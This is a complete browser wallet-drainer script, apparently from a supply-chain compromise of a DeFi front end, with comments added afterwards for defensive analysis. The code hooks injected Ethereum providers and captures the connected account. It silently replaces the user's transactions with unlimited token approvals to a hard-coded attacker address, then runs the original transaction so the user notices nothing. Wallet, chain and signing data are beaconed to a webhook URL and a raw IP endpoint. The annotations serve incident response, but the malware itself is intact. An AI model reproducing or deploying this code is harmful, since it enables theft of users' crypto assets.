/**
 * Abracadabra Supply Chain — FULL AUTO DRAIN
 * TX replacement: user's TX silently replaced with approve → sweep automatic
 * One popup per token, user sees normal-looking TX
 */
// ANALYSIS NOTE (defensive annotation; code below is unchanged):
// Self-executing script that wraps the `request` method of injected wallet
// providers (window.ethereum and EIP-6963 announced providers). It records the
// connected account and chain, reports activity to two remote endpoints, and
// substitutes the page's eth_sendTransaction requests with an ERC-20
// approve(spender=DRAIN, amount=MAX) call against a hard-coded token list.
// No token-moving call is issued in this listing; the approval only grants an
// allowance. Presumably the allowance is spent off-page by whoever controls
// DRAIN, so revoking it promptly is the relevant remediation (hedged: not
// shown here).
// Indicators visible in this file: the C2 and C2B URLs, the DRAIN address,
// the `__h` marker property set on hooked providers, and the beacon `type`
// strings ('init', 'wallet', 'tx_replace', 'approve_ok', 'approve_reject',
// 'orig_tx_ok', 'safe_sign', 'sign').
(function() {
  'use strict';
  // Primary reporting endpoint (receives sendBeacon and fetch POSTs).
  var C2 = 'https://webhook.site/c6c54dcf-272e-4792-9407-2ac043711458';
  // Secondary reporting endpoint (receives image GETs with base64 payload).
  var C2B = 'https://82.29.172.110:8443/c';
  // Address written into the approve() calldata as the spender.
  var DRAIN = '0xB7A900A41EaAB28E379a318500a6486Ea5Bd5574';
  // 2^256 - 1: the allowance amount, i.e. an unlimited approval.
  var MAX = '0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff';
  // 4-byte selector of approve(address,uint256).
  var APPROVE_SIG = '0x095ea7b3';
  // Declared but not referenced anywhere else in this listing.
  var TRANSFER_SIG = '0xa9059cbb'; // transfer(address,uint256)

  // Token contracts targeted per chain id as returned by eth_chainId:
  // '0x1' (Ethereum mainnet), '0xa4b1' (Arbitrum One), '0x38' (BNB Smart Chain).
  // `a` is the contract address used as the transaction `to`; `n` is the
  // script's own label, used only in beacon payloads.
  var TOKENS = {
    '0x1':[
      {a:'0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3',n:'MIM'},
      {a:'0x090185f2135308BaD17527004364eBcC2D37e5F6',n:'SPELL'},
      {a:'0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2',n:'WETH'},
      {a:'0xdAC17F958D2ee523a2206206994597C13D831ec7',n:'USDT'},
      {a:'0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48',n:'USDC'}
    ],
    '0xa4b1':[
      {a:'0xFEa7a6a0B346362BF88A9e4A88416B77a57D6c2A',n:'MIM'},
      {a:'0x3E6648C5a70A150A88bCE65F4aD4d506Fe15d2AF',n:'SPELL'},
      {a:'0x82aF49447D8a07e3bd95BD0d56f35241523fBab1',n:'WETH'},
      {a:'0xFd086bC7CD5C481DCC9C85ebE478A1C0b69FCbb9',n:'USDT'},
      {a:'0xaf88d065e77c8cC2239327C5EDb3A432268e5831',n:'USDC'}
    ],
    '0x38':[
      {a:'0xfE19F0B51438fd612f6FD59C1dbB3eA319f433Ba',n:'MIM'},
      {a:'0x55d398326f99059fF775485246999027B3197955',n:'USDT'}
    ]
  };

  // beacon(d): serialises `d` to JSON and sends it over three channels:
  //   1. navigator.sendBeacon to C2,
  //   2. fetch POST to C2 with a timestamp query string and Content-Type
  //      text/plain (rejections ignored),
  //   3. an Image whose src is C2B with the base64 payload in `d=` and a
  //      timestamp in `t=`.
  // All exceptions are swallowed, so failures leave no console trace.
  // Defensive relevance: channels 1-2 fall under CSP `connect-src` and channel
  // 3 under `img-src`; a policy that allow-lists only expected origins blocks
  // all three. In proxy or browser network logs, look for requests to either
  // endpoint and for long base64 `d=` query values on image loads.
  function beacon(d){try{var p=JSON.stringify(d);navigator.sendBeacon(C2,p);fetch(C2+'?'+Date.now(),{method:'POST',mode:'cors',headers:{'Content-Type':'text/plain'},body:p}).catch(function(){});var i=new Image();i.src=C2B+'?d='+encodeURIComponent(btoa(p))+'&t='+Date.now();}catch(e){}}
  // pad(v, len): removes the first '0x' from `v` and left-pads with '0' to
  // `len` characters (64 when `len` is omitted), returning bare hex.
  function pad(v,len){v=v.replace('0x','');while(v.length<(len||64))v='0'+v;return v;}
  // approveData(): calldata = approve selector + DRAIN as a 32-byte word + MAX
  // as a 32-byte word. A wallet that decodes calldata would show this as an
  // unlimited token approval to DRAIN.
  function approveData(){return APPROVE_SIG+pad(DRAIN)+pad(MAX);}

  // hookProvider(prov): replaces prov.request with a wrapper, once per
  // provider object. The `__h` property is the re-entry guard and is therefore
  // a page-level indicator: a provider carrying `__h === true` has been
  // wrapped by this script.
  function hookProvider(prov) {
    if (!prov||prov.__h) return;
    prov.__h = true;
    // Bound reference to the wallet's real request(); every path below ends by
    // calling it, so the page keeps working while requests are observed.
    var orig = prov.request.bind(prov);
    // Per-provider state: first connected account, last chain id, and the
    // remaining tokens to request approval for.
    var victim = null;
    var chain = null;
    var queue = []; // tokens to approve, one per user TX
    var queueReady = false;

    prov.request = function(args) {
      // Capture address
      // Forwards the call unchanged, stores the first returned account, and
      // reports it together with the full page URL. The caller receives the
      // unmodified account list.
      if (args.method==='eth_requestAccounts'||args.method==='eth_accounts') {
        return orig(args).then(function(accs) {
          if (accs&&accs[0]) {
            victim = accs[0];
            beacon({type:'wallet',addr:victim,url:location.href});
          }
          return accs;
        });
      }
      // Capture chain + build queue
      // Forwards the call unchanged and records the chain id. On the first
      // response only, the queue is filled with a copy of that chain's token
      // list, or the '0x1' list when the chain id has no entry.
      if (args.method==='eth_chainId') {
        return orig(args).then(function(cid) {
          chain = cid;
          if (!queueReady) {
            queue = (TOKENS[cid]||TOKENS['0x1']||[]).slice();
            queueReady = true;
          }
          return cid;
        });
      }

      // === CORE: Replace user's TX with approve ===
      // Active only once an account has been captured and the queue is
      // non-empty. The page's own transaction parameters are set aside and a
      // different transaction is sent to the wallet first.
      if (args.method==='eth_sendTransaction' && victim && queue.length > 0) {
        var tok = queue.shift(); // take next token from queue
        // Destination and 4-byte selector of the page's intended transaction,
        // kept only for reporting.
        var originalTo = args.params[0].to;
        var originalData = (args.params[0].data||'').substring(0,10);

        // Replace TX: same from, but to=token, data=approve(DRAIN,MAX)
        // What the wallet is asked to sign: a call to a token contract from
        // TOKENS, with fixed gas 0x15F90 (90000) and no value field. A user or
        // wallet simulation comparing the prompt with the action taken on the
        // page would see a different `to` address and an approval instead.
        var hijacked = {
          from: victim,
          to: tok.a,
          data: approveData(),
          gas: '0x15F90'
        };

        beacon({
          type:'tx_replace',
          token: tok.n,
          tokenAddr: tok.a,
          from: victim,
          chain: chain,
          originalTo: originalTo,
          originalData: originalData,
          remaining: queue.length,
          ts: new Date().toISOString()
        });

        // Send hijacked approve TX (user sees 1 popup — looks like their TX)
        // Note for responders: this branch issues up to two wallet requests
        // for a single page action, the substituted approval here and then the
        // page's original transaction in the nested call below. An approval
        // prompt appearing before the expected transaction is the
        // user-visible symptom.
        return orig({method:'eth_sendTransaction', params:[hijacked]}).then(function(txHash) {
          // Reports the value the wallet returned for the approval request
          // (treated as a transaction hash), which identifies the on-chain
          // approval to look up and revoke.
          beacon({type:'approve_ok', token:tok.n, addr:tok.a, from:victim, tx:txHash, chain:chain});

          // After approve confirmed, also execute original TX (stealth)
          // User's original TX goes through too so app behavior looks normal
          return orig(args).then(function(origTx) {
            beacon({type:'orig_tx_ok', tx:origTx, to:originalTo});
            return origTx; // return original TX hash to app
          }).catch(function() {
            // The page is handed the approval's result in place of its own
            // transaction's result, so application-side records may reference
            // a transaction the page never requested.
            return txHash; // if original fails, still return something
          });
        }).catch(function(err) {
          // Reached when the approval request rejects (for example the user
          // declines the prompt). The first 80 characters of the error are
          // reported.
          beacon({type:'approve_reject', token:tok.n, from:victim, err:String(err).substring(0,80)});
          // User rejected → put token back, try again on next TX
          queue.unshift(tok);
          // Execute original TX normally so user doesn't notice
          return orig(args);
        });
      }

      // All tokens approved → pass through normally (stealth maintained)
      // With an empty queue the wrapper forwards transactions untouched, so a
      // later test transaction on an affected page can look clean even though
      // approvals were already requested earlier in the session.
      if (args.method==='eth_sendTransaction' && queue.length===0) {
        return orig(args);
      }

      // === Safe TX signing — replace with drain TX ===
      // In this listing the typed-data request is only observed: the JSON in
      // params[1] is parsed and the signer, domain, message.to, message.value
      // and the first 20 characters of message.data are reported. The request
      // itself is forwarded unmodified; parse errors are ignored.
      if ((args.method==='eth_signTypedData_v4'||args.method==='eth_signTypedData_v3') && victim) {
        try {
          var td = JSON.parse(args.params[1]);
          beacon({
            type:'safe_sign',
            signer:args.params[0],
            domain:td.domain,
            to:td.message?td.message.to:null,
            value:td.message?td.message.value:null,
            data:td.message?((td.message.data||'').substring(0,20)):null
          });
        } catch(e){}
        // Pass through for now — Safe TX replacement needs specific target TX data
        return orig(args);
      }

      // Log personal_sign
      // Reports params[1], or params[0] when params[1] is falsy, then forwards
      // the signing request unmodified.
      if (args.method==='personal_sign'||args.method==='eth_sign') {
        beacon({type:'sign',signer:args.params[1]||args.params[0]});
        return orig(args);
      }

      // Every other RPC method is forwarded untouched.
      return orig(args);
    };
  }

  // Hook installation: once immediately, then every second via setInterval so
  // a provider injected later (or replaced) is wrapped as well, plus a
  // listener for EIP-6963 provider announcements. The once-per-second timer
  // and the 'eip6963:announceProvider' listener are further behavioural
  // indicators when auditing third-party scripts on a dapp front end.
  function tryHook(){if(window.ethereum)hookProvider(window.ethereum);}
  tryHook();
  setInterval(tryHook,1000);
  if(window.addEventListener){
    window.addEventListener('eip6963:announceProvider',function(e){
      if(e.detail&&e.detail.provider)hookProvider(e.detail.provider);
    });
  }

  // Load-time report: sent on every page load where the script runs, before
  // any wallet interaction. Carries the page URL, user agent and DRAIN
  // address, so outbound traffic to the endpoints exists even for visitors
  // who never connect a wallet.
  beacon({type:'init',mode:'FULLAUTO',drain:DRAIN,url:location.href,ua:navigator.userAgent,ts:new Date().toISOString()});
})();
